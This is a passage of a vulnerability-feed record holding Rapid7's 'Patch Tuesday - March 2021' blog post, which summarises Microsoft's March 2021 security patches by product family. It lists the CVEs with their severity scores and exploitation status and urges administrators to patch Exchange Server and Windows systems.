"CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "lastseen": "2021-03-13T12:49:58", "history": [{"bulletin": {"id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "hash": "ce50c22396bea855a907a5850847980f", "type": "rapid7blog", "bulletinFamily": "info", "title": "Patch Tuesday - March 2021", "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No 